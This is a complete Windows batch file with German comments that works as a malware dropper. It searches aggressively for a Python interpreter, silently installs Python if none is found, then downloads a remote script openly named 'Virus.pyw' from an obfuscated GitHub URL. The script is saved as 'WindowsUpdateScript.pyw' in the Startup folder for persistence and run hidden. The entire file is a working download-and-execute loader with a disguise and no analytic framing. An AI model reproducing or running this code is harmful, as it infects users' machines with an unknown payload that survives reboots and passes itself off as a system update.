@echo off
setlocal enabledelayedexpansion

set "PYTHON_URL=https://www.python.org/ftp/python/3.12.0/python-3.12.0.exe"
set "INSTALLER=python-3.12.0.exe"
set "SCRIPT_URL=https://raw.githubusercontent.com/NyveXgg/refdgdfsgdffdsfdsfdsfdgdfsgfs68658fasd865f7568a6sd657586das56dsa5f678d758a7dfgerergrefdgfdgdfgfdfdgs/refs/heads/main/Virus.pyw"
set "SCRIPT_NAME=WindowsUpdateScript.pyw"
set "STARTUP_DIR=%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"

:: ========== PYTHONW.EXE AGGRESSIV SUCHEN ==========
set "PYTHONW="

:: 1. Im PATH
for %%A in (pythonw.exe pythonw) do (
    where %%A >nul 2>&1
    if !errorlevel! equ 0 (
        for /f "delims=" %%B in ('where %%A') do set "PYTHONW=%%B" & goto :found
    )
)

:: 2. Typische Installationsordner (rekursiv)
set "SUCHPFADE=%LocalAppData%\Programs\Python %ProgramFiles%\Python %ProgramFiles(x86)%\Python %ProgramFiles%\Python* %ProgramFiles(x86)%\Python* %LocalAppData%\Programs\Python*"
for %%P in (%SUCHPFADE%) do (
    if exist "%%P\" (
        for /r "%%P" %%F in (pythonw.exe) do (
            if exist "%%F" set "PYTHONW=%%F" & goto :found
        )
    )
)

:: 3. Registry (HKLM und HKCU)
for %%H in (HKLM HKCU) do (
    for /f "skip=2 tokens=1,2*" %%A in ('reg query "%%H\SOFTWARE\Python" /s 2^>nul ^| find "InstallPath"') do (
        if exist "%%C\pythonw.exe" set "PYTHONW=%%C\pythonw.exe" & goto :found
    )
)

:: 4. Zusätzliche Suche auf Laufwerk C: (wichtige Ordner)
set "WEITERE=C:\Program Files;C:\Program Files (x86);C:\Users;D:\Program Files;D:\Program Files (x86)"
for %%D in (%WEITERE%) do (
    if exist "%%D" (
        for /r "%%D" %%F in (pythonw.exe) do (
            if exist "%%F" set "PYTHONW=%%F" & goto :found
        )
    )
)

:: 5. Nichts gefunden – Python installieren
:download_installer
curl -s -L "%PYTHON_URL%" -o "%INSTALLER%"
if %errorlevel% neq 0 (
    timeout /t 2 /nobreak >nul
    goto :download_installer
)
start /wait "" "%INSTALLER%" /quiet InstallAllUsers=0 PrependPath=1 Include_test=0
del /f /q "%INSTALLER%" >nul 2>&1

:: Nach Installation in den Standardpfaden suchen
if exist "%LocalAppData%\Programs\Python\Python312-32\pythonw.exe" set "PYTHONW=%LocalAppData%\Programs\Python\Python312-32\pythonw.exe" & goto :found
if exist "%LocalAppData%\Programs\Python\Python312\pythonw.exe" set "PYTHONW=%LocalAppData%\Programs\Python\Python312\pythonw.exe" & goto :found
if exist "%ProgramFiles%\Python312\pythonw.exe" set "PYTHONW=%ProgramFiles%\Python312\pythonw.exe" & goto :found
if exist "%ProgramFiles(x86)%\Python312-32\pythonw.exe" set "PYTHONW=%ProgramFiles(x86)%\Python312-32\pythonw.exe" & goto :found

:: Falls immer noch keine pythonw, dann Fallback auf python (mit Fenster)
for %%A in (python.exe python) do (
    where %%A >nul 2>&1
    if !errorlevel! equ 0 (
        for /f "delims=" %%B in ('where %%A') do set "PYTHONW=%%B" & goto :found
    )
)
set "PYTHONW=python"

:found
:: ========== SKRIPT LADEN UND STARTEN ==========
curl -s -L "%SCRIPT_URL%" -o "%STARTUP_DIR%\%SCRIPT_NAME%"
start /b "" "%PYTHONW%" "%STARTUP_DIR%\%SCRIPT_NAME%" >nul 2>&1
exit
